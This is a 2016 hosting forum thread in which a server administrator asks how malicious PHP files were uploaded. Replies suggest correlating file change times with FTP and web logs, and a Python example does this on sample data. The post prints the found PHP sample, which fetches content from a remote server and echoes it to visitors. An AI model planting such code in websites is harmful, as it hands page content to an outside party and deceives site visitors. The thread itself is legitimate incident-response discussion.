
Find out how files were uploaded

Discussion in 'Security' started by ::Gomez::, Sep 13, 2016.

  1. ::Gomez::

    ::Gomez:: Member

    Hi, I am dealing with a security issue inside an account. Every day new files are uploaded to public_html and subfolders, with strange content inside.

    for example...

    /home/xxx/public_html/rtrfei.php
    /home/xxx/public_html/fdbs.php

    content is pretty much the same on any of the files...

    PHP:
    <?php
    // Remove the script execution time limit
    set_time_limit(0);

    header("Content-Type: text/html;charset=gb2312");
    date_default_timezone_set('PRC');
    $Remote_server = "http://www.example.date/";
    $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
    // Fetch content from the remote server, passing this host, query string and domain
    $Content_mb=file_get_contents($Remote_server."/AK47/2.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

    // Serve the fetched content to the visitor
    echo $Content_mb;

    ?>

    I would like to know if there is any way of finding out how these files were uploaded (FTP, SCP, SSH, via a script on the server, etc.).

    I think this is the first step to be able to identify the root cause of this issue.

    I do have root access to the server.


    thanks!
     
    #1 ::Gomez::, Sep 13, 2016
    Last edited by a moderator: Sep 13, 2016
  2. sparek-3

    sparek-3 Well-Known Member

    You need to get a timestamp of when the files were placed on the server, then look for activity (cPanel access, FTP, web) around that same time. That will help lead you in the direction of how the files came to be on the server.
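
The correlation described in this reply, as an added example that is not part of the original post: it takes a file's change time and lists log entries that fall within a window around it. It assumes web requests are logged in Apache combined format and FTP transfers in xferlog format; the log lines, addresses, paths and the UTC-3 zone below are constructed sample data.

```python
import os, re
from datetime import datetime, timedelta, timezone

# Apache combined log: ip - user [13/Sep/2016:03:14:07 -0300] "POST /path HTTP/1.1" ...
APACHE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')
# xferlog: date, seconds, client, bytes, file, type, flag, direction (i = upload)
XFER = re.compile(r'^(\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \d+ (\S+) \d+ (\S+) \S \S (\S)')

def change_time(path, tz):
    """Inode change time (ctime); unlike mtime it cannot be set directly with touch."""
    return datetime.fromtimestamp(os.stat(path).st_ctime, tz)

def parse_line(line, local_tz):
    """Return (when, source, client, action, path), or None if the line is unrecognised."""
    m = APACHE.match(line)
    if m:
        when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        return when, "web", m.group(1), m.group(3), m.group(4)
    m = XFER.match(line)
    if m:
        # xferlog carries no zone; assume the server's local zone (passed in)
        when = datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y").replace(tzinfo=local_tz)
        action = "upload" if m.group(4) == "i" else "download"
        return when, "ftp", m.group(2), action, m.group(3)
    return None

def correlate(changed_at, lines, local_tz, window=timedelta(seconds=120)):
    """Log entries within `window` of the file's change time, closest first."""
    hits = []
    for line in lines:
        rec = parse_line(line, local_tz)
        if rec and abs(rec[0] - changed_at) <= window:
            hits.append(rec)
    return sorted(hits, key=lambda r: abs(r[0] - changed_at))

# Constructed sample data (not from the thread); server zone assumed to be UTC-3.
TZ = timezone(timedelta(hours=-3))
SAMPLE = [
    '192.0.2.10 - - [13/Sep/2016:02:50:00 -0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'Tue Sep 13 03:13:30 2016 1 203.0.113.7 412 /home/xxx/public_html/index.html b _ i r xxx ftp 0 * c',
    '198.51.100.23 - - [13/Sep/2016:03:14:07 -0300] "POST /uploader.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
]
CHANGED_AT = datetime(2016, 9, 13, 3, 14, 7, tzinfo=TZ)  # stands in for change_time(path, TZ)

if __name__ == "__main__":
    for when, source, client, action, path in correlate(CHANGED_AT, SAMPLE, TZ):
        print(when.isoformat(), source, client, action, path)
```

A POST request or an FTP upload that lands within seconds of the file's change time is the entry to examine first; no match in either log points towards other channels such as SSH, cron or the control panel.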
     
  3. NOC_Serverpoint

    NOC_Serverpoint Well-Known Member

    You would just have to check the network and file access logs on the server.
     
  4. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member
